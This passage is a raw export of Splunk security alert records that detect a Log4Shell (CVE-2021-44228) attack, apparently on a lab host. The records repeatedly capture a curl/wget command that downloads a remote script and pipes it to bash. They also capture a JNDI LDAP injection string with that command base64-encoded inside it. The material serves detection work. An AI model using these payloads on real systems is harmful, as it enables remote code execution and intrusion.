This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640053, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._all="PR.DS", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 12", annotations._all="Actions on Objectives", annotations._all="DE.AE", annotations._all="DE.CM", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640052, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 3", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640053, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._all="PR.DS", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 12", annotations._all="Actions on Objectives", annotations._all="DE.AE", annotations._all="DE.CM", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640052, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 3", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
